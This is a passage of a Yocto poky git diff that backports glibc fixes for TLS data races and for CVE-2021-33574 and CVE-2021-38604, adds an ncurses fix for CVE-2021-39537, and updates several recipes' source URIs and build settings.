++++++++- + elf/dl-support.c | 7 ++ + elf/dl-tls.c | 16 ++--- + elf/rtld.c | 1 + + sysdeps/nptl/fork.c | 3 + + sysdeps/generic/ldsodefs.h | 9 ++- + 10 files changed, 235 insertions(+), 12 deletions(-) +--- +Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5] +Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case. +Signed-off-by: Akash Hadke +Signed-off-by: Akash Hadke +--- +diff --git a/elf/dl-close.c b/elf/dl-close.c +index 93ff5c96e9..cfe0f1c0c9 100644 +--- a/elf/dl-close.c ++++ b/elf/dl-close.c +@@ -551,6 +551,9 @@ + size_t tls_free_end; + tls_free_start = tls_free_end = NO_TLS_OFFSET; + ++ /* Protects global and module specitic TLS state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); ++ + /* We modify the list of loaded objects. */ + __rtld_lock_lock_recursive (GL(dl_load_write_lock)); + +@@ -786,6 +789,9 @@ + GL(dl_tls_static_used) = tls_free_start; + } + ++ /* TLS is cleaned up for the unloaded modules. */ ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); ++ + #ifdef SHARED + /* Auditing checkpoint: we have deleted all objects. */ + if (__glibc_unlikely (do_audit)) +diff --git a/elf/dl-open.c b/elf/dl-open.c +index 5295e931b0..6ea5dd2457 100644 +--- a/elf/dl-open.c ++++ b/elf/dl-open.c +@@ -57,6 +57,9 @@ + (non-negative). */ + unsigned int original_global_scope_pending_adds; + ++ /* Set to true if the end of dl_open_worker_begin was reached. */ ++ bool worker_continue; ++ + /* Original parameters to the program and the current environment. */ + int argc; + char **argv; +@@ -473,7 +473,7 @@ + } + + static void +-dl_open_worker (void *a) ++dl_open_worker_begin (void *a) + { + struct dl_open_args *args = a; + const char *file = args->file; +@@ -747,6 +747,36 @@ + if (mode & RTLD_GLOBAL) + add_to_global_resize (new); + ++ args->worker_continue = true; ++} ++ ++static void ++dl_open_worker (void *a) ++{ ++ struct dl_open_args *args = a; ++ ++ args->worker_continue = false; ++ ++ { ++ /* Protects global and module specific TLS state. */ ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); ++ ++ struct dl_exception ex; ++ int err = _dl_catch_exception (&ex, dl_open_worker_begin, args); ++ ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); ++ ++ if (__glibc_unlikely (ex.errstring != NULL)) ++ /* Reraise the error. */ ++ _dl_signal_exception (err, &ex, NULL); ++ } ++ ++ if (!args->worker_continue) ++ return; ++ ++ int mode = args->mode; ++ struct link_map *new = args->map; ++ + /* Run the initializer functions of new objects. Temporarily + disable the exception handler, so that lazy binding failures are + fatal. */ +diff --git a/elf/dl-support.c b/elf/dl-support.c +index 02e2ed72f5..d99c1f1d62 100644 +--- a/elf/dl-support.c ++++ b/elf/dl-support.c +@@ -219,6 +219,13 @@ + list of loaded objects while an object is added to or removed from + that list. */ + __rtld_lock_define_initialized_recursive (, _dl_load_write_lock) ++/* This lock protects global and module specific TLS related data. ++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation), ++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are ++ accessed and when TLS related relocations are processed for a ++ module. It was introduced to keep pthread_create accessing TLS ++ state that is being set up. */ ++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock) + + + #ifdef HAVE_AUX_VECTOR +diff --git a/elf/dl-tls.c b/elf/dl-tls.c +index d554ae4497..9260d2d696 100644 +--- a/elf/dl-tls.c ++++ b/elf/dl-tls.c +@@ -443,7 +443,7 @@ + size_t maxgen = 0; + + /* Protects global dynamic TLS related state. */ +- __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); + + /* Check if the current dtv is big enough. */ + if (dtv[-1].counter < GL(dl_tls_max_dtv_idx)) +@@ -517,7 +517,7 @@ + listp = listp->next; + assert (listp != NULL); + } +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + + /* The DTV version is up-to-date now. */ + dtv[0].counter = maxgen; +@@ -656,7 +656,7 @@ + + Here the dtv needs to be updated to new_gen generation count. + +- This code may be called during TLS access when GL(dl_load_lock) ++ This code may be called during TLS access when GL(dl_load_tls_lock) + is not held. In that case the user code has to synchronize with + dlopen and dlclose calls of relevant modules. A module m is + relevant if the generation of m <= new_gen and dlclose of m is +@@ -778,11 +778,11 @@ + if (__glibc_unlikely (the_map->l_tls_offset + != FORCED_DYNAMIC_TLS_OFFSET)) + { +- __rtld_lock_lock_recursive (GL(dl_load_lock)); ++ __rtld_lock_lock_recursive (GL(dl_load_tls_lock)); + if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET)) + { + the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET; +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + } + else if (__glibc_likely (the_map->l_tls_offset + != FORCED_DYNAMIC_TLS_OFFSET)) +@@ -794,7 +794,7 @@ + #else + # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined" + #endif +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + + dtv[GET_ADDR_MODULE].pointer.to_free = NULL; + dtv[GET_ADDR_MODULE].pointer.val = p; +@@ -802,7 +802,7 @@ + return (char *) p + GET_ADDR_OFFSET; + } + else +- __rtld_lock_unlock_recursive (GL(dl_load_lock)); ++ __rtld_lock_unlock_recursive (GL(dl_load_tls_lock)); + } + struct dtv_pointer result = allocate_and_init (the_map); + dtv[GET_ADDR_MODULE].pointer = result; +@@ -873,7 +873,7 @@ + return NULL; + + dtv_t *dtv = THREAD_DTV (); +- /* This may be called without holding the GL(dl_load_lock). Reading ++ /* This may be called without holding the GL(dl_load_tls_lock). Reading + arbitrary gen value is fine since this is best effort code. */ + size_t gen = atomic_load_relaxed (&GL(dl_tls_generation)); + if (__glibc_unlikely (dtv[0].counter != gen)) +diff --git a/elf/rtld.c b/elf/rtld.c +index 8d2bba3d43..9642eb9c92 100644 +--- a/elf/rtld.c ++++ b/elf/rtld.c +@@ -283,6 +283,7 @@ + #ifdef _LIBC_REENTRANT + ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, + ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, ++ ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER, + #endif + ._dl_nns = 1, + ._dl_ns = +diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c +index c471f7b15f..021691b9b7 100644 +--- a/sysdeps/nptl/fork.c ++++ b/sysdeps/nptl/fork.c +@@ -125,6 +125,9 @@ + /* Reset the lock the dynamic loader uses to protect its data. */ + __rtld_lock_initialize (GL(dl_load_lock)); + ++ /* Reset the lock protecting dynamic TLS related data. */ ++ __rtld_lock_initialize (GL(dl_load_tls_lock)); ++ + /* Run the handlers registered for the child. */ + __run_fork_handlers (atfork_run_child, multiple_threads); + } +diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h +index d49529da0d..9ec1511bb0 100644 +--- a/sysdeps/generic/ldsodefs.h ++++ b/sysdeps/generic/ldsodefs.h +@@ -369,6 +369,13 @@ + list of loaded objects while an object is added to or removed + from that list. */ + __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock) ++ /* This lock protects global and module specific TLS related data. ++ E.g. it is held in dlopen and dlclose when GL(dl_tls_generation), ++ GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are ++ accessed and when TLS related relocations are processed for a ++ module. It was introduced to keep pthread_create accessing TLS ++ state that is being set up. */ ++ __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock) + + /* Incremented whenever something may have been added to dl_loaded. */ + EXTERN unsigned long long _dl_load_adds; +@@ -1153,7 +1160,7 @@ + + /* Add module to slot information data. If DO_ADD is false, only the + required memory is allocated. Must be called with GL +- (dl_load_lock) acquired. If the function has already been called ++ (dl_load_tls_lock) acquired. If the function has already been called + for the link map L with !do_add, then this function will not raise + an exception, otherwise it is possible that it encounters a memory + allocation failure. */ +-- +2.27.0 diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch new file mode 100644 index 0000000000..cef0ce54ed --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch @@ -0,0 +1,72 @@ +From 42d359350510506b87101cf77202fefcbfc790cb Mon Sep 17 00:00:00 2001 +From: Andreas Schwab +Date: Thu, 27 May 2021 12:49:47 +0200 +Subject: [PATCH] Use __pthread_attr_copy in mq_notify (bug 27896) + +Make a deep copy of the pthread attribute object to remove a potential +use-after-free issue. + +Upstream-Status: Backport +CVE: CVE-2021-33574 patch#1 +Signed-off-by: Armin Kuster + +--- + NEWS | 4 ++++ + sysdeps/unix/sysv/linux/mq_notify.c | 15 ++++++++++----- + 2 files changed, 14 insertions(+), 5 deletions(-) + +Index: git/NEWS +=================================================================== +--- git.orig/NEWS ++++ git/NEWS +@@ -7,6 +7,10 @@ using `glibc' in the "product" field. + + Version 2.31.1 + ++ CVE-2021-33574: The mq_notify function has a potential use-after-free ++ issue when using a notification type of SIGEV_THREAD and a thread ++ attribute with a non-default affinity mask. ++ + The following bugs are resolved with this release: + [19519] iconv(1) with -c option hangs on illegal multi-byte sequences + (CVE-2016-10228) +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -135,8 +135,11 @@ helper_thread (void *arg) + (void) __pthread_barrier_wait (¬ify_barrier); + } + else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED) +- /* The only state we keep is the copy of the thread attributes. */ +- free (data.attr); ++ { ++ /* The only state we keep is the copy of the thread attributes. */ ++ pthread_attr_destroy (data.attr); ++ free (data.attr); ++ } + } + return NULL; + } +@@ -257,8 +260,7 @@ mq_notify (mqd_t mqdes, const struct sig + if (data.attr == NULL) + return -1; + +- memcpy (data.attr, notification->sigev_notify_attributes, +- sizeof (pthread_attr_t)); ++ __pthread_attr_copy (data.attr, notification->sigev_notify_attributes); + } + + /* Construct the new request. */ +@@ -272,7 +274,10 @@ mq_notify (mqd_t mqdes, const struct sig + + /* If it failed, free the allocated memory. */ + if (__glibc_unlikely (retval != 0)) +- free (data.attr); ++ { ++ pthread_attr_destroy (data.attr); ++ free (data.attr); ++ } + + return retval; + } diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch new file mode 100644 index 0000000000..396cd7fc0e --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch @@ -0,0 +1,73 @@ +From 217b6dc298156bdb0d6aea9ea93e7e394a5ff091 Mon Sep 17 00:00:00 2001 +From: Florian Weimer +Date: Tue, 1 Jun 2021 17:51:41 +0200 +Subject: [PATCH] Fix use of __pthread_attr_copy in mq_notify (bug 27896) + +__pthread_attr_copy can fail and does not initialize the attribute +structure in that case. + +If __pthread_attr_copy is never called and there is no allocated +attribute, pthread_attr_destroy should not be called, otherwise +there is a null pointer dereference in rt/tst-mqueue6. + +Fixes commit 42d359350510506b87101cf77202fefcbfc790cb +("Use __pthread_attr_copy in mq_notify (bug 27896)"). + +Reviewed-by: Siddhesh Poyarekar + +https://sourceware.org/bugzilla/attachment.cgi?id=13497 + +Upstream-Status: Backport +CVE: CVE-2021-33574 patch#2 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -260,7 +260,34 @@ mq_notify (mqd_t mqdes, const struct sig + if (data.attr == NULL) + return -1; + +- __pthread_attr_copy (data.attr, notification->sigev_notify_attributes); ++ memcpy (data.attr, notification->sigev_notify_attributes, ++ sizeof (pthread_attr_t)); ++ ++ struct pthread_attr *source = ++ (struct pthread_attr *) (notification->sigev_notify_attributes); ++ struct pthread_attr *target = (struct pthread_attr *) (data.attr); ++ cpu_set_t *newp; ++ cpu_set_t *cpuset = source->cpuset; ++ size_t cpusetsize = source->cpusetsize; ++ ++ /* alloc a new memory for cpuset to avoid use after free */ ++ if (cpuset != NULL && cpusetsize > 0) ++ { ++ newp = (cpu_set_t *) malloc (cpusetsize); ++ if (newp == NULL) ++ { ++ free(data.attr); ++ return -1; ++ } ++ ++ memcpy (newp, cpuset, cpusetsize); ++ target->cpuset = newp; ++ } ++ else ++ { ++ target->cpuset = NULL; ++ target->cpusetsize = 0; ++ } + } + + /* Construct the new request. */ +@@ -273,7 +300,7 @@ mq_notify (mqd_t mqdes, const struct sig + int retval = INLINE_SYSCALL (mq_notify, 2, mqdes, &se); + + /* If it failed, free the allocated memory. */ +- if (__glibc_unlikely (retval != 0)) ++ if (retval != 0 && data.attr != NULL) + { + pthread_attr_destroy (data.attr); + free (data.attr); diff --git a/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch b/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch new file mode 100644 index 0000000000..36fd4a61b2 --- /dev/null +++ b/poky/meta/recipes-core/glibc/glibc/CVE-2021-38604.patch @@ -0,0 +1,41 @@ +From b805aebd42364fe696e417808a700fdb9800c9e8 Mon Sep 17 00:00:00 2001 +From: Nikita Popov +Date: Mon, 9 Aug 2021 20:17:34 +0530 +Subject: [PATCH] librt: fix NULL pointer dereference (bug 28213) + +Helper thread frees copied attribute on NOTIFY_REMOVED message +received from the OS kernel. Unfortunately, it fails to check whether +copied attribute actually exists (data.attr != NULL). This worked +earlier because free() checks passed pointer before actually +attempting to release corresponding memory. But +__pthread_attr_destroy assumes pointer is not NULL. + +So passing NULL pointer to __pthread_attr_destroy will result in +segmentation fault. This scenario is possible if +notification->sigev_notify_attributes == NULL (which means default +thread attributes should be used). + +Signed-off-by: Nikita Popov +Reviewed-by: Siddhesh Poyarekar + +Upstream-Status: Backport +CVE: CVE-2021-38604 +Signed-off-by: Armin Kuser + +--- + sysdeps/unix/sysv/linux/mq_notify.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: git/sysdeps/unix/sysv/linux/mq_notify.c +=================================================================== +--- git.orig/sysdeps/unix/sysv/linux/mq_notify.c ++++ git/sysdeps/unix/sysv/linux/mq_notify.c +@@ -134,7 +134,7 @@ helper_thread (void *arg) + to wait until it is done with it. */ + (void) __pthread_barrier_wait (¬ify_barrier); + } +- else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED) ++ else if (data.raw[NOTIFY_COOKIE_LEN - 1] == NOTIFY_REMOVED && data.attr != NULL) + { + /* The only state we keep is the copy of the thread attributes. */ + pthread_attr_destroy (data.attr); diff --git a/poky/meta/recipes-core/glibc/glibc_2.31.bb b/poky/meta/recipes-core/glibc/glibc_2.31.bb index 8742efc36f..4a545cb97d 100644 --- a/poky/meta/recipes-core/glibc/glibc_2.31.bb +++ b/poky/meta/recipes-core/glibc/glibc_2.31.bb @@ -67,6 +67,17 @@ SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \ file://0028-inject-file-assembly-directives.patch \ file://0029-locale-prevent-maybe-uninitialized-errors-with-Os-BZ.patch \ file://CVE-2020-29573.patch \ + file://CVE-2021-33574_1.patch \ + file://CVE-2021-33574_2.patch \ + file://CVE-2021-38604.patch \ + file://0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch \ + file://0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch \ + file://0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch \ + file://0033-elf-Add-test-case-for-BZ-19329.patch \ + file://0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch \ + file://0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \ + file://0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch \ + file://0037-Avoid-deadlock-between-pthread_create-and-ctors.patch \ " S = "${WORKDIR}/git" B = "${WORKDIR}/build-${TARGET_SYS}" diff --git a/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch b/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch index 52986e61c7..d1835c7a10 100644 --- a/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch +++ b/poky/meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch @@ -400,7 +400,7 @@ Index: ldconfig-native-2.12.1/ldconfig.c return 0; } -+#define REPORT_BUGS_TO "mailing list : poky@yoctoproject.org" ++#define REPORT_BUGS_TO "mailing list : poky@lists.yoctoproject.org" /* Print bug-reporting information in the help message. */ static char * more_help (int key, const char *text, void *input) diff --git a/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb b/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb index 16807eb675..c3681defdc 100644 --- a/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb +++ b/poky/meta/recipes-core/ifupdown/ifupdown_0.8.35.bb @@ -7,7 +7,7 @@ the file /etc/network/interfaces." LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" -SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/ifupdown.git;protocol=https;branch=master \ file://defn2-c-man-don-t-rely-on-dpkg-architecture-to-set-a.patch \ file://99_network \ file://0001-Define-FNM_EXTMATCH-for-musl.patch \ diff --git a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb index 96c47bd2af..e75b82cf1e 100644 --- a/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb +++ b/poky/meta/recipes-core/images/build-appliance-image_15.0.0.bb @@ -24,7 +24,7 @@ IMAGE_FSTYPES = "wic.vmdk" inherit core-image setuptools3 -SRCREV ?= "f22c2d6670d3b6f0d6eaa201fb2f9307a8d503d5" +SRCREV ?= "d752cbcbbeeea9adbcc9aa74def1761f34a9de54" SRC_URI = "git://git.yoctoproject.org/poky;branch=dunfell \ file://Yocto_Build_Appliance.vmx \ file://Yocto_Build_Appliance.vmxf \ diff --git a/poky/meta/recipes-core/libxcrypt/libxcrypt.inc b/poky/meta/recipes-core/libxcrypt/libxcrypt.inc index 2d2a0b03e3..b6bf48ba79 100644 --- a/poky/meta/recipes-core/libxcrypt/libxcrypt.inc +++ b/poky/meta/recipes-core/libxcrypt/libxcrypt.inc @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \ inherit autotools pkgconfig -SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https" SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c" SRCBRANCH ?= "develop" diff --git a/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb b/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb index 60dc71f38d..ebb996c8dd 100644 --- a/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb +++ b/poky/meta/recipes-core/libxml/libxml2_2.9.10.bb @@ -44,7 +44,7 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," inherit autotools pkgconfig binconfig-disabled ptest features_check -inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)} +inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)} RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}" diff --git a/poky/meta/recipes-core/meta/cve-update-db-native.bb b/poky/meta/recipes-core/meta/cve-update-db-native.bb index e86c69803f..50052f8532 100644 --- a/poky/meta/recipes-core/meta/cve-update-db-native.bb +++ b/poky/meta/recipes-core/meta/cve-update-db-native.bb @@ -17,7 +17,7 @@ python () { raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.") } -python do_populate_cve_db() { +python do_fetch() { """ Update NVD database with json data feed """ @@ -110,7 +110,9 @@ python do_populate_cve_db() { conn.close() } -do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_fetch[file-checksums] = "" +do_fetch[vardeps] = "" def initialize_db(c): c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)") @@ -217,7 +219,6 @@ def update_db(c, jsondata): parse_node_and_insert(c, config, cveId) -addtask do_populate_cve_db before do_fetch -do_populate_cve_db[nostamp] = "1" +do_fetch[nostamp] = "1" EXCLUDE_FROM_WORLD = "1" diff --git a/poky/meta/recipes-core/musl/libucontext_git.bb b/poky/meta/recipes-core/musl/libucontext_git.bb index ec988f1920..71beb80083 100644 --- a/poky/meta/recipes-core/musl/libucontext_git.bb +++ b/poky/meta/recipes-core/musl/libucontext_git.bb @@ -10,7 +10,7 @@ DEPENDS = "" PV = "0.10+${SRCPV}" SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561" -SRC_URI = "git://github.com/kaniini/libucontext \ +SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/musl/musl-obstack.bb b/poky/meta/recipes-core/musl/musl-obstack.bb index 3003935fe5..74de48c2cd 100644 --- a/poky/meta/recipes-core/musl/musl-obstack.bb +++ b/poky/meta/recipes-core/musl/musl-obstack.bb @@ -10,7 +10,7 @@ SECTION = "libs" PV = "1.1" SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4" -SRC_URI = "git://github.com/pullmoll/musl-obstack" +SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/musl/musl-utils.bb b/poky/meta/recipes-core/musl/musl-utils.bb index dd0ce33061..c30509469c 100644 --- a/poky/meta/recipes-core/musl/musl-utils.bb +++ b/poky/meta/recipes-core/musl/musl-utils.bb @@ -11,7 +11,7 @@ SECTION = "utils" PV = "20170421" SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d" -SRC_URI = "git://github.com/boltlinux/musl-utils" +SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/musl/musl_git.bb b/poky/meta/recipes-core/musl/musl_git.bb index 82379fd1c5..cbb56f4769 100644 --- a/poky/meta/recipes-core/musl/musl_git.bb +++ b/poky/meta/recipes-core/musl/musl_git.bb @@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}" # mirror is at git://github.com/kraj/musl.git -SRC_URI = "git://git.musl-libc.org/musl \ +SRC_URI = "git://git.musl-libc.org/musl;branch=master \ file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \ file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \ " diff --git a/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch new file mode 100644 index 0000000000..7655200350 --- /dev/null +++ b/poky/meta/recipes-core/ncurses/files/CVE-2021-39537.patch @@ -0,0 +1,30 @@ +$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $ + +Fix for CVE-2021-39537 from upstream: +https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340 + +CVE: CVE-2021-39537 +Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup] +Signed-off-by: Ranjitsinh Rathod + +--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000 ++++ b/ncurses/tinfo/captoinfo.c +@@ -216,12 +216,15 @@ cvtchar(register const char *sp) + } + break; + case '^': ++ len = 2; + c = UChar(*++sp); +- if (c == '?') ++ if (c == '?') { + c = 127; +- else ++ } else if (c == '\0') { ++ len = 1; ++ } else { + c &= 0x1f; +- len = 2; ++ } + break; + default: + c = UChar(*sp); diff --git a/poky/meta/recipes-core/ncurses/ncurses.inc b/poky/meta/recipes-core/ncurses/ncurses.inc index 7f1834f0dc..ee0b15ecf0 100644 --- a/poky/meta/recipes-core/ncurses/ncurses.inc +++ b/poky/meta/recipes-core/ncurses/ncurses.inc @@ -13,7 +13,7 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \ inherit autotools binconfig-disabled multilib_header pkgconfig # Upstream has useful patches at times at ftp://invisible-island.net/ncurses/ -SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https" +SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master" EXTRA_AUTORECONF = "-I m4" diff --git a/poky/meta/recipes-core/ncurses/ncurses_6.2.bb b/poky/meta/recipes-core/ncurses/ncurses_6.2.bb index 76f0cf97f4..700464f70b 100644 --- a/poky/meta/recipes-core/ncurses/ncurses_6.2.bb +++ b/poky/meta/recipes-core/ncurses/ncurses_6.2.bb @@ -3,6 +3,7 @@ require ncurses.inc SRC_URI += "file://0001-tic-hang.patch \ file://0002-configure-reproducible.patch \ file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \ + file://CVE-2021-39537.patch \ " # commit id corresponds to the revision in package version SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4" diff --git a/poky/meta/recipes-core/os-release/os-release.bb b/poky/meta/recipes-core/os-release/os-release.bb index a29d678125..33f75e39b8 100644 --- a/poky/meta/recipes-core/os-release/os-release.bb +++ b/poky/meta/recipes-core/os-release/os-release.bb @@ -12,7 +12,9 @@ do_configure[noexec] = "1" # Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME # HOME_URL SUPPORT_URL BUG_REPORT_URL -OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME" +OS_RELEASE_FIELDS = "\ + ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \ +" OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID" ID = "${DISTRO}" diff --git a/poky/meta/recipes-core/psplash/psplash_git.bb b/poky/meta/recipes-core/psplash/psplash_git.bb index 22c71f099b..b2947c2114 100644 --- a/poky/meta/recipes-core/psplash/psplash_git.bb +++ b/poky/meta/recipes-core/psplash/psplash_git.bb @@ -10,7 +10,7 @@ SRCREV = "0a902f7cd875ccf018456451be369f05fa55f962" PV = "0.1+git${SRCPV}" PR = "r15" -SRC_URI = "git://git.yoctoproject.org/${BPN} \ +SRC_URI = "git://git.yoctoproject.org/${BPN};branch=master \ file://psplash-init \ file://psplash-start.service \ file://psplash-systemd.service \ diff --git a/poky/meta/recipes-core/systemd/systemd.inc b/poky/meta/recipes-core/systemd/systemd.inc index 3165d13f03..8b5260bb0d 100644 --- a/poky/meta/recipes-core/systemd/systemd.inc +++ b/poky/meta/recipes-core/systemd/systemd.inc @@ -16,6 +16,6 @@ LIC_FILES_CHKSUM = "file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe \ SRCREV = "3ceaa81c61b654ebf562464d142675bd4d57d7b6" SRCBRANCH = "v244-stable" -SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=git;branch=${SRCBRANCH}" +SRC_URI = "git://github.com/systemd/systemd-stable.git;protocol=https;branch=${SRCBRANCH}" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch b/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch new file mode 100644 index 0000000000..86d9b0499a --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch @@ -0,0 +1,78 @@ +From 1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= +Date: Tue, 1 Sep 2020 12:42:35 +0200 +Subject: [PATCH] basic: pass allocation info for ordered_set_new() and + introduce ordered_set_ensure_put() + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/1f25c71d9d0b5fe6cf383c347dcebc2443a99fe1] +Signed-off-by: Ranjitsinh Rathod + +--- + src/basic/ordered-set.c | 21 +++++++++++++++++++++ + src/basic/ordered-set.h | 18 +++++++----------- + 2 files changed, 28 insertions(+), 11 deletions(-) + +diff --git 